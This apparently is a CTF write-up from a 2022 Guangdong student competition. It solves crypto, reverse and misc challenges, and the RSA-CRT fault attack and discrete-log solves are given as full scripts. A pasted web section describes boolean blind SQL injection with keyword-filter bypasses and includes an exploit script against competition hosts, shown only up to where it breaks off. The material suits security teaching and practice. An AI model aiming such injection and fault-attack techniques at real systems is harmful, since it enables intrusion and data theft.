2022 Guangdong College Student Attack-Defense Competition Writeup

Posted by 嘻哈磕碜 on 2024-05-13

MISC

複合

Try exporting the HTTP objects from the capture.

Both the file types and the file names have been tampered with.


Rename pass.md to pass.zip; it still will not open.

Add the missing file header.


Unzipping yields:

Emklyusg=E2=80=82gni=E2=80=82bvvymlag=E2=80=82tsqic=E2=80=82colz=E2=80=82jx=
moxvl=E2=80=82tiwhz=E2=80=82ebmee,=E2=80=82Zhjeoig=E2=80=82Krpvpi-Zgvlyvx=
=E2=80=82Evdr=E2=80=82or=E2=80=82olv=E2=80=82Rbtm=E2=80=82bl=E2=80=82Gcscck=
h=E2=80=82une=E2=80=82fz=E2=80=82e=E2=80=82tftstrtkdrx=E2=80=82rxeb=E2=80=
=82suv=E2=80=82olfqx=E2=80=82dpb=E2=80=82tizh=E2=80=82km=E2=80=82kliq=E2=80=
=82ox=E2=80=82hsjr:=E2=80=82mom=E2=80=82luyik,=E2=80=82kfx=E2=80=82dwhrh-wi=
=E2=80=82iympwagp,=E2=80=82vru=E2=80=82ral=E2=80=82qzveomvlm.=E2=80=82Aw=E2=
=80=82fgc=E2=80=82olrr=E2=80=82fhvl=E2=80=82nivpkf=E2=80=82vhzr=E2=80=82vvj=
jvqlpwagpn=E2=80=82jrje=E2=80=82pvgu=E2=80=82xcijc=E2=80=82vhbrmsmmvq=E2=80=
=82bz=E2=80=82vbz=E2=80=82xj=E2=80=82jrsea=E2=80=82bukq=E2=80=82wyk=E2=80=
=82kxymye=E2=80=82xj=E2=80=82hvqvyqok=E2=80=82xcid.=E2=80=82Uav=E2=80=82jro=
rb=E2=80=82cfsgn=E2=80=82knt=E2=80=82oisn=E2=80=82uahb=E2=80=82vz=E2=80=82m=
n=E2=80=82pzix=E2=80=82aw=E2=80=82ok=E2=80=82sgh?=E2=80=82Nfh=E2=80=82aznor=
zh=E2=80=82zl=E2=80=82plagkvi=E2=80=82wtgxubvlmx=E2=80=82qvbbjqak=E2=80=82h=
vvvq=E2=80=82gvb=E2=80=82gxc=E2=80=82os=E2=80=82sc=E2=80=82khbvurvp?=E2=80=
=82Wjtn=E2=80=82qf=E2=80=82rmai=E2=80=82zq=E2=80=82yhvggwomt.Ygk=E2=80=82eu=
u=E2=80=82gvyxfm=E2=80=82bx=E2=80=82vt=E2=80=82xci=E2=80=82kylr-weoiixvb=E2=
=80=82btxrxeommc=E2=80=82hm=E2=80=82kbtxzqgmkhzl=E2=80=82siymtggl=E2=80=82k=
nt=E2=80=82xmycw=E2=80=82vsivs=E2=80=82xci=E2=80=82mgkacr=E2=80=82uj=E2=80=
=82kekgxukr?=E2=80=82Kzzr=E2=80=82scyvzr=E2=80=82seiexcw-jiek=E2=80=82mimkg=
taqikw=E2=80=82ns=E2=80=82xpxhbye=E2=80=82migictzmq=E2=80=82zlz=E2=80=82tic=
lzcek,=E2=80=82tccjgvpiay=E2=80=82azvv=E2=80=82dttwhypt=E2=80=82xzkx-kzvbii=
,=E2=80=82xiybumq=E2=80=82zs=E2=80=82nivi=E2=80=82xmnvimzrtw=E2=80=82bu=E2=
=80=82iyr=E2=80=82xcmeel,=E2=80=82jiek=E2=80=82sa=E2=80=82trrblvgy=E2=80=82=
tmsdgglvgrc=E2=80=82vqflz=E2=80=82aprs.=E2=80=82Xj=E2=80=82wlaa=E2=80=82wme=
ysiw,=E2=80=82kfx=E2=80=82apbakcx=E2=80=82fd=E2=80=82kliqorb=E2=80=82e=E2=
=80=82emolt=E2=80=82zgc=E2=80=82nivk=E2=80=82t=E2=80=82wzblpdkrrx=E2=80=82d=
ifzi=E2=80=82jj=E2=80=82kgfl.=E2=80=82Eue=E2=80=82wkieb=E2=80=82avcey=E2=80=
=82vzeuggn=E2=80=82iouyo=E2=80=82ayym=E2=80=82umikv=E2=80=82cegnxumq?=E2=80=
=82Zldw=E2=80=82hsxzbvur=E2=80=82cej=E2=80=82zxlv=E2=80=82rrslyvlmsg=E2=80=
=82ntwriicw=E2=80=82vdrx=E2=80=82xci=E2=80=82pctya=E2=80=82oe=E2=80=82xcsjc=
=E2=80=82pow=E2=80=82hyi=E2=80=82gmkckhbhxi=E2=80=82dr=E2=80=82dcwpknr=E2=
=80=82iyytympwa.=E2=80=82

The =XX escapes and the trailing = soft line breaks identify this as quoted-printable; every =E2=80=82 is the UTF-8 encoding of U+2002 (EN SPACE), so the words are simply separated by en spaces. Decoding gives:

Emklyusg gni bvvymlag tsqic colz jxmoxvl tiwhz ebmee, Zhjeoig Krpvpi-Zgvlyvx Evdr or olv Rbtm bl Gcscckh une fz e tftstrtkdrx rxeb suv olfqx dpb tizh km kliq ox hsjr: mom luyik, kfx dwhrh-wi iympwagp, vru ral qzveomvlm. Aw fgc olrr fhvl nivpkf vhzr vvjjvqlpwagpn jrje pvgu xcijc vhbrmsmmvq bz vbz xj jrsea bukq wyk kxymye xj hvqvyqok xcid. Uav jrorb cfsgn knt oisn uahb vz mn pzix aw ok sgh? Nfh aznorzh zl plagkvi wtgxubvlmx qvbbjqak hvvvq gvb gxc os sc khbvurvp? Wjtn qf rmai zq yhvggwomt.Ygk euu gvyxfm bx vt xci kylr-weoiixvb btxrxeommc hm kbtxzqgmkhzl siymtggl knt xmycw vsivs xci mgkacr uj kekgxukr? Kzzr scyvzr seiexcw-jiek mimkgtaqikw ns xpxhbye migictzmq zlz ticlzcek, tccjgvpiay azvv dttwhypt xzkx-kzvbii, xiybumq zs nivi xmnvimzrtw bu iyr xcmeel, jiek sa trrblvgy tmsdgglvgrc vqflz aprs. Xj wlaa wmeysiw, kfx apbakcx fd kliqorb e emolt zgc nivk t wzblpdkrrx difzi jj kgfl. Eue wkieb avcey vzeuggn iouyo ayym umikv cegnxumq? Zldw hsxzbvur cej zxlv rrslyvlmsg ntwriicw vdrx xci pctya oe xcsjc pow hyi gmkckhbhxi dr dcwpknr iyytympwa. 

Rename flagggggg.exe to .doc.


FLAG.png is actually the installer for Everything.

That gives the key: everything

Vigenère decryption with that key:

Arguably the greatest novel ever written about aging, Gabriel Garcia-Marquez Love in the Time of Cholera may be a challenging text for those who need to read it most: the young, the would-be rational, and the impatient. To say that many health care professionals fall into these categories is not to fault them but merely to describe them. Who being young can know what it is like to be old? Who trained in western scientific medicine dares not try to be rational? Flag is life is fantastic.And who caught up in the task-oriented imperative of contemporary medicine can truly claim the virtue of patience? Even before managed-care initiatives so greatly increased the pressure, physicians were famously time-driven, trained to seek efficiency in all things, care of patients prominently among them. To such persons, the thought of reading a novel may seem a profligate waste of time. Why spend hours reading about what never happened? This question has been eloquently answered over the years by those who use literature in medical education.

Flag is life is fantastic

flag{life_is_fantastic}
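As an added example (not from the original writeup), the whole decoding chain in Python: quoted-printable decoding of the captured text, Vigenère decryption with the key everything, and extraction of the flag sentence from the prose. The two quoted-printable lines used as the sample are the first two lines of the dump above, and the ciphertext string is the decoded text as printed above.

```python
import quopri
import re

# Constructed sample: the first two quoted-printable lines from the capture above.
# "=E2=80=82" is UTF-8 for U+2002 (EN SPACE); a trailing "=" is a soft line break.
QP_SAMPLE = (
    "Emklyusg=E2=80=82gni=E2=80=82bvvymlag=E2=80=82tsqic=E2=80=82colz=E2=80=82jx=\n"
    "moxvl=E2=80=82tiwhz=E2=80=82ebmee,=E2=80=82Zhjeoig=E2=80=82Krpvpi-Zgvlyvx=\n"
)

# The full Vigenère ciphertext, i.e. the quoted-printable dump after decoding.
CIPHERTEXT = "Emklyusg gni bvvymlag tsqic colz jxmoxvl tiwhz ebmee, Zhjeoig Krpvpi-Zgvlyvx Evdr or olv Rbtm bl Gcscckh une fz e tftstrtkdrx rxeb suv olfqx dpb tizh km kliq ox hsjr: mom luyik, kfx dwhrh-wi iympwagp, vru ral qzveomvlm. Aw fgc olrr fhvl nivpkf vhzr vvjjvqlpwagpn jrje pvgu xcijc vhbrmsmmvq bz vbz xj jrsea bukq wyk kxymye xj hvqvyqok xcid. Uav jrorb cfsgn knt oisn uahb vz mn pzix aw ok sgh? Nfh aznorzh zl plagkvi wtgxubvlmx qvbbjqak hvvvq gvb gxc os sc khbvurvp? Wjtn qf rmai zq yhvggwomt.Ygk euu gvyxfm bx vt xci kylr-weoiixvb btxrxeommc hm kbtxzqgmkhzl siymtggl knt xmycw vsivs xci mgkacr uj kekgxukr? Kzzr scyvzr seiexcw-jiek mimkgtaqikw ns xpxhbye migictzmq zlz ticlzcek, tccjgvpiay azvv dttwhypt xzkx-kzvbii, xiybumq zs nivi xmnvimzrtw bu iyr xcmeel, jiek sa trrblvgy tmsdgglvgrc vqflz aprs. Xj wlaa wmeysiw, kfx apbakcx fd kliqorb e emolt zgc nivk t wzblpdkrrx difzi jj kgfl. Eue wkieb avcey vzeuggn iouyo ayym umikv cegnxumq? Zldw hsxzbvur cej zxlv rrslyvlmsg ntwriicw vdrx xci pctya oe xcsjc pow hyi gmkckhbhxi dr dcwpknr iyytympwa."


def qp_decode(text):
    """Undo quoted-printable (soft breaks, =XX escapes) and turn the en spaces into ASCII spaces."""
    return quopri.decodestring(text.encode()).decode("utf-8").replace("\u2002", " ")


def vigenere_decrypt(ciphertext, key):
    """Classic Vigenère: the key index advances only on letters, case is kept, other characters pass through."""
    out, k = [], 0
    key = key.lower()
    for ch in ciphertext:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = ord(key[k % len(key)]) - ord("a")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)


def extract_flag(plaintext):
    """The flag is hidden in the prose as 'Flag is <words>.'; rebuild it in flag{...} form."""
    m = re.search(r"Flag is (.+?)\.", plaintext)
    return "flag{" + m.group(1).replace(" ", "_") + "}" if m else None


if __name__ == "__main__":
    print(qp_decode(QP_SAMPLE))
    pt = vigenere_decrypt(CIPHERTEXT, "everything")
    print(pt)
    print(extract_flag(pt))
```

The key index is only advanced on letters; had it advanced on every character the en spaces and punctuation would desynchronise the key and the output would be garbage after the first word.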

EasySteg

flag


Reverse it:

hide

I did not know how to continue from here; does anyone know?

CRYPTO

crypto-xor2

"Cyclic XOR encryption, can you break it? Format: flag{}"

The download contains a Python file and a text file.

The description tells us this is just an XOR cipher with a repeating key:

from secret import flag

key = "xxxx" # not real key

cipher = ""
for i, c in enumerate(flag):
    cipher += chr(ord(c) ^ ord(key[i%4]))

with open("cipher", "w") as f:
    f.write(cipher)


Print the raw cipher bytes first, then XOR them back exactly the way the encryptor did. The "xxxx" placeholder turns out to be the real key: the flag must start with flag{, and 0x1e ^ 'f', 0x14 ^ 'l', 0x19 ^ 'a', 0x1f ^ 'g' all give 0x78 = 'x', while 0x03 ^ 'x' = '{' confirms the period of 4.

key = "xxxx"   # the "not real key" placeholder is the real key (see above)

with open("cipher", "rb") as f:
    data = f.read()
print(data)
# b'\x1e\x14\x19\x1f\x03\x1e\x1b\x1b\x1aHNNMU\x1a\x1b\x1dMU\x1cKJAU\x19\x1b\x19OUAAIOA\x1a\x1c\x1bA\x1d\x1cK\x05'

# undo the encryption: XOR each byte with the key byte at the same position mod 4
flag = "".join(chr(c ^ ord(key[i % 4])) for i, c in enumerate(data))
print(flag)
# flag{fccb0665-bce5-d329-aca7-99179bdc9ed3}
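As an added example (not part of the original writeup): recover the key from the known flag{ prefix instead of assuming the placeholder, then decrypt. The ciphertext bytes are the ones printed above.

```python
# Ciphertext bytes as printed above.
CIPHER = b'\x1e\x14\x19\x1f\x03\x1e\x1b\x1b\x1aHNNMU\x1a\x1b\x1dMU\x1cKJAU\x19\x1b\x19OUAAIOA\x1a\x1c\x1bA\x1d\x1cK\x05'


def recover_key(cipher, known_prefix, keylen):
    """Known-plaintext attack on a repeating-key XOR: key[i] = cipher[i] ^ plaintext[i]
    for the first keylen positions, so a known prefix at least keylen bytes long gives the whole key."""
    if len(known_prefix) < keylen:
        raise ValueError("need at least keylen bytes of known plaintext")
    return bytes(cipher[i] ^ known_prefix[i] for i in range(keylen))


def xor_decrypt(cipher, key):
    """Repeating-key XOR is its own inverse."""
    return bytes(c ^ key[i % len(key)] for i, c in enumerate(cipher))


def solve(cipher=CIPHER, keylen=4):
    """Key length 4 comes from the challenge source (key[i%4]); the prefix flag{ is the flag format."""
    key = recover_key(cipher, b"flag{", keylen)
    return key, xor_decrypt(cipher, key)


if __name__ == "__main__":
    key, flag = solve()
    print(key, flag)
```

Because the recovered key repeats a single byte, even a single-byte XOR brute force over the 256 candidates would have found it; the known-prefix approach is the general one when the key bytes differ.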

RSA Fault

The challenge is built on a fault in RSA-CRT decryption. Normally RSA-CRT decryption goes:

  • compute mp = c^dp mod p
  • compute mq = c^dq mod q
  • combine mp and mq with the CRT to obtain the plaintext m mod n

The challenge decrypts by this same flow, except that a fault is injected while decrypting:

from secrets import randbelow

def fault_signature(m,dp,p):
    bits = list(range(dp.bit_length()))
    # Random Errors: flip two distinct bits of the CRT exponent
    for i in range(2):
        dp ^= 1 << bits.pop(randbelow(len(bits)))
    return pow(m,dp,p)

That is, while computing mp and mq, two random bits of dp and two of dq get flipped. What does that do? Take dp as the example and relate the faulty result to the correct one. Suppose that after the fault bit i of dp went from 1 to 0 and bit j went from 0 to 1, so that $d_p' = d_p - 2^i + 2^j$.

When computing the plaintext, the correct mp should be:

$$m_p = c^{d_p} \pmod p$$

After the fault it becomes:

$$m_p' = c^{d_p'} = c^{d_p - 2^i + 2^j} \pmod p$$

that is:

$$m_p' = m_p \cdot c^{-2^i + 2^j} \pmod p$$

That is the relationship between the correct and faulty values. How do we exploit it? Look at the CRT recombination:

from Crypto.Util.number import inverse

def fast_sign(p,q,m,d):
    Sp=fault_signature(m,d%(p-1),p)   # faulty m^dp mod p
    Sq=fault_signature(m,d%(q-1),q)   # faulty m^dq mod q
    q_inv_p=inverse(q,p)
    return Sq+((Sp-Sq)*q_inv_p%p)*q   # Garner's form of the CRT recombination
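As an added illustration of the attack just described (not part of the original writeup, and independent of the exp that follows), a self-contained toy in Python: it builds a small RSA key from two Mersenne primes, injects the same two-bit fault into dp and dq, and recovers a factor of n from the faulty decryption by testing every delta = ±2^i ± 2^j. The primes, the message and the flipped positions are constructed for the demo. c^(e·2^i) is precomputed once per i so each guess costs one multiplication and one gcd instead of a fresh modular exponentiation.

```python
from math import gcd

# Constructed toy parameters: two Mersenne primes, far smaller than the challenge's 4096-bit n.
P, Q, E = 2**89 - 1, 2**107 - 1, 65537


def fault_signature(m, dp, p, flips):
    """Same fault model as the challenge, but the flipped bit positions are passed in
    so the run is reproducible; the challenge draws them with randbelow()."""
    for b in flips:
        dp ^= 1 << b
    return pow(m, dp, p)


def faulty_crt_decrypt(c, d, p, q, flips_p, flips_q):
    """The challenge's fast_sign(): CRT recombination of two faulty half-exponentiations."""
    sp = fault_signature(c, d % (p - 1), p, flips_p)
    sq = fault_signature(c, d % (q - 1), q, flips_q)
    return sq + ((sp - sq) * pow(q, -1, p) % p) * q


def recover_factor(n, e, c, m_fault, max_bits):
    """m_fault^e * c^-1 == c^(e*delta_p) (mod p) with delta_p = ±2^i ± 2^j but not mod q,
    so gcd(m_fault^e * c^-1 - c^(e*delta), n) is p (or, for delta_q, q) on the right guess."""
    target = pow(m_fault, e, n) * pow(c, -1, n) % n
    pos = [pow(c, e << i, n) for i in range(max_bits)]   # c^(e*2^i), a 0->1 flip
    neg = [pow(x, -1, n) for x in pos]                  # c^(-e*2^i), a 1->0 flip
    for i in range(max_bits):
        for j in range(i + 1, max_bits):
            for a in (pos[i], neg[i]):
                for b in (pos[j], neg[j]):
                    g = gcd((target - a * b) % n, n)
                    if 1 < g < n:
                        return g
    return None


def demo(plaintext=b"flag{toy}", flips_p=(5, 40), flips_q=(3, 70)):
    """Encrypt, decrypt with the fault, factor n from the faulty result, decrypt correctly."""
    n = P * Q
    d = pow(E, -1, (P - 1) * (Q - 1))
    m = int.from_bytes(plaintext, "big")
    c = pow(m, E, n)
    m_fault = faulty_crt_decrypt(c, d, P, Q, flips_p, flips_q)
    assert m_fault != m                      # the fault really corrupted the output
    p = recover_factor(n, E, c, m_fault, max(P.bit_length(), Q.bit_length()))
    q = n // p
    d_rec = pow(E, -1, (p - 1) * (q - 1))
    return pow(c, d_rec, n).to_bytes(len(plaintext), "big")


if __name__ == "__main__":
    print(demo())
```

The search space is quadratic in the bit length of dp, which is why the real exp limits the positions it tries; with the precomputed tables the full range for a 2048-bit dp is a few million multiplications rather than a few million modular exponentiations.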

Since the faulty result $m'$ satisfies $m' \equiv m_p' \pmod p$, raising it to $e$ gives $m'^e \equiv c^{e d_p} \cdot c^{e(-2^i+2^j)} \equiv c \cdot c^{e(-2^i+2^j)} \pmod p$, while the same relation does not hold modulo $q$ (dq suffered different flips). So $m'^e \cdot c^{-1} - c^{e\delta}$ is divisible by $p$ exactly when the guess $\delta = \pm 2^i \pm 2^j$ matches the flips in dp, and a gcd with $n$ reveals $p$. The script below searches i, j and the four sign combinations; in it c is the ciphertext and m_ the faulty decryption.

exp:

from Crypto.Util.number import *
from tqdm import *
from gmpy2 import powmod

n=574370586922196377355321224190746373039960224108385243176501127428241048239267855106791452531127716395867009150959315133488286007016233693579335880694651355103104937242790643593308890788070770218317565926178413379641001140239463599845984585594216005669250735996427555432706918692021991171275999765908594644925310142503285857206438695393554469523893825536665449736024054747514990216868678037268511584416901858031484008394871632441625217801474466940448366132590034239161293582715621533020233700914500451000518789317508997706548731775994224900635411275356861073588492237057246039324320408280417962081059669609944892848853780428862986621290797973749713412083663630592820568996851852624888672199864050563167321198235872086549523724070759241183192416218511190119068501395848056263721692763920519420483450363920749842894919641617223824549955451175853298676915196907992214900910995739550922989640910170960485331090144764984190331659966983894284549074935918333832010695306946738396909292095557434605170122130253447970074530010535669698871315126545879037607033278200101983233974781109773521793185318497615158089955239305362817170200396186939592803861438759399366317967907276433739944705398688186125687434884160720331949648831768235019520753051
c=362746477666691362768020792694001662947338474716913368693174463002520197020564066827257658031973928782798475691408938544507860754837561076547768524746177804704585961840013195670850383664598530250844247051357401431355747035161872296498272254812117528152035029837329888665483050219346048506686826529658339084796751613191344103470399897412327265769031997892130002446603232458409236206943209821169103651387451247194645094911282908657256087747570185214886614187576679719039472798093505360214315789098466937327166004179112376884521755838649234980317596136131856395020357496102439866802500120832803908679095031213229175799928906606183829594039803465175754892790016569054202014492252632598390521485126555541028488750683218149923230255353856768460065582373942152212466578732981079533510158716511814895961705462125751613632997737277288382147402327477915047046907933387151859100428914053565582939275934201969543786806286829008145312080251388532179582069076383305307261868697565579486745927759554919760999971562169014832448067746716988944857402974596263631030324458073601261131647030891982010744785938573077302132228457909917393551651580730603193283673617373961392738841147569262489888662190518624689563339261875140574320207133638608459439737908
e=65537
m_=181132170825291068274428850998643597061484670852441092778734815200952945165798640567559048182854905384108012241001865806757291292964878403693878633267090257939702439086938795033128278779133834594418004509584542651057754389391530368493133213945631248904554493258521520798694334742694993906802448945319763766711250429667767598356479263059390167552213786607866923685142648716071350485727194734337940552363833868066952302121733855882534848604214379852034329599650298994536987432597047148545264456233041626319601655687038246563924371156826280023920057214856878486989521822479101902273314188727929753114744387793613654594486456078456745565816416446216301510436912147365878585967444947975888852483708054850555285865986707367641310078228756765470506112047816213856326341605584860221570211438661212837691148838965467195299751453604986777239749470579607668379117939736929002608940866262332919423512927188694030664492052057406513313547841154542784730283602499247284074861014689921502985853652524070575242018309321538365113665998744193304726118797289396908257027371761721071940141406755037691084908985405935268861122559095563199460082893754126987724947094729974089127671509635467188911500940561377499209529543406027692937688249517323189766222196


if(0):   # set to 1 to rerun the search; p below is pasted from a finished run
    # c is the ciphertext, m_ the faulty decryption: temp = m_^e * c^-1 = c^(e*delta_p) (mod p)
    temp = pow(m_,e,n)*inverse(c,n) % n
    is_positive = [(1,1),(1,-1),(-1,1),(-1,-1)]   # each flip is either 1->0 (minus) or 0->1 (plus)
    for i in trange(1,2**9):          # bit positions tried; dp itself can be as wide as p
        for j in range(1,2**9):
            for k in is_positive:
                pow1 = k[0] * (1 << i)
                pow2 = k[1] * (1 << j)

                powpow = e*(pow1+pow2)
                temp1 = powmod(c,powpow,n)    # c^(e*delta) for the guessed delta
                if(GCD(temp-temp1,n) != 1):   # hit: the gcd is p (or q)
                    print(GCD(temp-temp1,n))
                    exit()

p = 22729650064982784569842293886112765216527000770423090114368848726216608009470242046289112001066994207864986803275467348289746127450153723652496430471357120041795298501429299577023455880461653074271752126909063527106805373676824002441432786073264913608717964699805549233067291369590239167126966358735428766668880762276154481715084785307608648063807156963867353713246912838175911702373808989338864178007028831198106910117378309595596445705841624769259901086135441435201197082487810720560245568126972348046187117147996691190165006379956721543713979012391623875001928207563847027939516349080119621035628223197354404395029
q = n // p
phi = (p-1)*(q-1)
d = inverse(e,phi)
print(long_to_bytes(pow(c,d,n)))

flag{r$a_fault_w1th_C5T_m3thod_01a7da73}

EzLog

# Sage script: ^ is exponentiation; prod, Mod and discrete_log come from Sage
from Crypto.Util.number import *

p = 100380180012669637378744942171261398091918624065560475592116442008723831000724625143134783707140522784290998397673597179788440926203643287774297527809892664834392514365222771089497090006645985087685142898313371176199974996077656302299931624478967894041880873282005346940525877863969908284953093553124147377177
g = 5
y = 96684738736980459903034929785324785968796025930893469779531286222406396988966715592949333235326832011076688325476630562163362584667393368651336925308324274452289994386658111183814813840211779123227496106401048680166365937882835154692663834966767665274167877263256747696012785293060701554746392300871850636481
# the smooth part of p-1 (about 860 bits); h = (p-1)/phi is the rough cofactor
factors = [3^2,56989,60217,538687139,560945999,571334087,610502371,631183649,632950873,635821279,650856469,655219333,656624429,681519161,718737731,731233123,733484177,763003931,789196883,819494821,819518603,844402217,857626969,895870279,907446997,908829937,950563309,972564941,1030070381,1048221233,1063554559]
phi = prod(factors)
h = (p-1) // phi

# part 1: Pohlig-Hellman in the subgroup of order phi gives m0 = m mod phi (use sage)
m0 = discrete_log(Mod(pow(y,h,p),p),Mod(pow(g,h,p),p),ord = phi)


# part 2: guess that the message ends in "}." followed by 13 bytes of padding (each byte 0x0d),
# so m = 256^length * M + suffix with M = k*phi + m1; this yields m1 = M mod phi
padlen = 13
suffix = bytes_to_long(b"}." + long_to_bytes(padlen)*padlen)
length = padlen + 2
m1 = (m0-suffix)*inverse(256^length,phi) % phi


# part 3: y / g^(256^length*m1 + suffix) = g^(256^length*k*phi); the cofactor k is small
# (at most 1024-860-length*8 bits), so baby-step giant-step with bounds recovers it (use sage)
y1 = y * pow(g,-(256^length*m1+suffix),p) % p
g1 = pow(g,256^length*phi,p)
k = discrete_log(Mod(y1,p),Mod(g1,p),ord = p-1,bounds = (0,2^(1024-860-length*8)))


# part 4: reassemble the message
flag = 256^length*(k*phi+m1)+suffix
print(long_to_bytes(flag))

#b'You are a master of the dlp algos! Here is your flag: flag{S0_Smooth_ord3r_pr1me_dlp!_pohlig_hellman_with_padding}.\r\r\r\r\r\r\r\r\r\r\r\r\r'

flag{S0_Smooth_ord3r_pr1me_dlp!_pohlig_hellman_with_padding}
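The script above is Sage. As an added example (not part of the original writeup), here are the same four steps in plain Python on constructed toy parameters: Pohlig-Hellman over the smooth part of p-1, removal of the known suffix, and baby-step giant-step for the remaining small cofactor. The prime p = 2·h'·PHI + 1, the generator g and the message flag{t} are all constructed here, and the known suffix is the single byte }.

```python
from math import isqrt

# Constructed toy parameters: the smooth part of p-1 is PHI, the rest is 2*h' with h' a ~32-bit prime.
FACTORS = [(3, 2), (5, 1), (7, 1), (11, 1), (13, 1), (17, 1), (19, 1), (23, 1)]
PHI = 3**2 * 5 * 7 * 11 * 13 * 17 * 19 * 23       # 334639305

def is_prime(n):
    """Deterministic Miller-Rabin for n < 3.3e24 (first twelve primes as bases)."""
    bases = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)
    if n < 2:
        return False
    for b in bases:
        if n % b == 0:
            return n == b
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for a in bases:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def make_params():
    """Find p = 2*h'*PHI + 1 prime (h' prime) and a generator g of the whole group."""
    hp = (1 << 32) + 1
    while not (is_prime(hp) and is_prime(2 * hp * PHI + 1)):
        hp += 2
    p = 2 * hp * PHI + 1
    prime_divisors = [2, hp] + [q for q, _ in FACTORS]
    g = 2
    while any(pow(g, (p - 1) // r, p) == 1 for r in prime_divisors):
        g += 1
    return p, g

def bsgs(g, h, p, bound):
    """Baby-step giant-step: x in [0, bound) with g^x == h (mod p), else None."""
    m = isqrt(bound) + 1
    baby, cur = {}, 1
    for j in range(m):
        baby.setdefault(cur, j)
        cur = cur * g % p
    giant, gamma = pow(g, -m, p), h
    for i in range(m):
        if gamma in baby:
            return i * m + baby[gamma]
        gamma = gamma * giant % p
    return None

def crt(residues, moduli):
    x, mod = 0, 1
    for r, m in zip(residues, moduli):
        x += mod * ((r - x) * pow(mod, -1, m) % m)
        mod *= m
    return x

def pohlig_hellman(g, h, p, order, factors):
    """log_g h for g of smooth order `order` = prod q^e: one base-q digit at a time, then CRT."""
    residues, moduli = [], []
    for q, e in factors:
        qe = q**e
        gi, hi = pow(g, order // qe, p), pow(h, order // qe, p)   # gi has order q^e
        gamma, x = pow(gi, q**(e - 1), p), 0                       # gamma has order q
        for k in range(e):
            hk = pow(pow(gi, -x, p) * hi % p, q**(e - 1 - k), p)  # equals gamma^(digit k)
            x += bsgs(gamma, hk, p, q) * q**k
        residues.append(x)
        moduli.append(qe)
    return crt(residues, moduli)

def solve(p, g, y, factors, phi, suffix):
    """The page's four steps: m mod phi, strip the known suffix, BSGS for the small cofactor k."""
    L = len(suffix)
    s = int.from_bytes(suffix, "big")
    h = (p - 1) // phi
    m0 = pohlig_hellman(pow(g, h, p), pow(y, h, p), p, phi, factors)   # m mod phi
    m1 = (m0 - s) * pow(pow(256, L, phi), -1, phi) % phi              # M mod phi, where m = 256^L*M + s
    y1 = y * pow(g, -(256**L * m1 + s), p) % p                        # = g^(256^L * k * phi)
    g1 = pow(g, 256**L * phi, p)
    k = bsgs(g1, y1, p, (p - 1) // (256**L * phi) + 1)
    return 256**L * (k * phi + m1) + s

def demo(message=b"flag{t}"):
    p, g = make_params()
    m = int.from_bytes(message, "big")
    assert m < p - 1                          # the logarithm is only defined mod p-1
    y = pow(g, m, p)
    return solve(p, g, y, FACTORS, PHI, b"}").to_bytes(len(message), "big")
```

The bound handed to the final bsgs is (p-1)/(256^L·phi) + 1, the largest k that fits below p; in the challenge that is the 2^(1024-860-length·8) passed to Sage's discrete_log.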

REVERSE

pyre

"How does this exe call Python libraries, and how do you reverse it? Xiaoming, you give it a try!"

Install uncompyle6 and decompile Origin.pyc:

pip install uncompyle6
uncompyle6 Origin.pyc 

That yields the source:

def check():
    a = input("plz input your flag:")
    c = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152,
     78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53,
     152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
    if len(a) != 42:
        print("wrong length")
        return 0
    b = 179
    for i in range(len(a)):
        if ord(a[i]) * 33 % b != c[i]:
            print("wrong")
            return

    print("win")


check()

Since 179 is prime and 33 is invertible modulo 179, every value in c has exactly one preimage among the printable characters, so a per-character brute force (stopping at the first match) recovers the flag:

def crack():
    c = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152, 78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53, 152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
    b = 179
    for enc in c:
        for i in range(32,127):
            if 33 * i % b == enc:
                print(chr(i),end='')
                break
crack()

flag{2889e7a3-0d6b-4cbb-b6e9-04c0f26c9dca}

WEB

The following is pasted from other people's writeups.

Web | easy_ctf (141pt)

Pull the content out, count it, sort it, then submit; that's all.

import requests
import re

RE = re.compile(r'^([a-zA-Z0-9]*)<td>', re.MULTILINE)

def f(r):
    p = {}
    for c in r:
        if c in p:
            p[c] += 1
        else:
            p[c] = 1
    a = [ (v, k) for (k, v) in p.items() ]
    a = sorted(a)
    return ''.join([ c[1] for c in a ])

s = requests.Session()
r = s.get('http://120.79.191.238:42399')

while True:
    print(r.text)
    m = re.search(RE, r.text)
    a = m.group(1)
    a = f(a)

    r = s.post('http://120.79.191.238:42399', data={'ans': a})

Web | easysql (833pt)

Testing and observation show that the ad title has an injection point, usable in the form '||{sql}||'. After an ad is submitted its details can be viewed, and whether the ad displays normally tells you whether the {sql} condition is true, so boolean blind injection works.

The title also has a keyword filter covering in, or, and, union, password and so on; and / or can be bypassed with && / ||.

Because in and or are blocked, there is no way to query table and column names through information_schema or mysql.innodb_table_stats, and MariaDB has no sys database.

So I used the great blind-guessing method (that is, several hours of guessing) and found an ads table with 22 columns, and a users table with id, name and, presumably, password (useless, since the admin account had nothing in it).

Blind guessing again (admin's md5 turned up an extremely similar challenge, so maybe there was a flag column/table/database), I found a flag table, and without knowing its column names used SELECT (SELECT * FROM flag) >= (SELECT 1, {string}) for the blind injection, which gave a flag with no case information.

I brute-forced the flag's casing a little, since I was too weak to find a case-sensitive injection query (bINary is filtered, and MariaDB has no JSON).
After some more random enumeration it turned out only the S in sql is uppercase, i.e. flag{Sql_1nj3cti0n_1s_s0_easy}, which was accepted.

import requests
import re

cookies = {'PHPSESSID': '_______________'}
RE = re.compile(r'detail\.php\?id=(\d+)')

def clear_list():
    requests.get('http://120.79.141.85:47930/empty.php', cookies=cookies)

def add_ads(title):
    global aid
    payload = {'title': title, 'content': 'Elaina is best', 'ac': 'add'}
    r = requests.post('http://120.79.141.85:47930/addads.php', cookies=cookies, data=payload)
    aid += 1
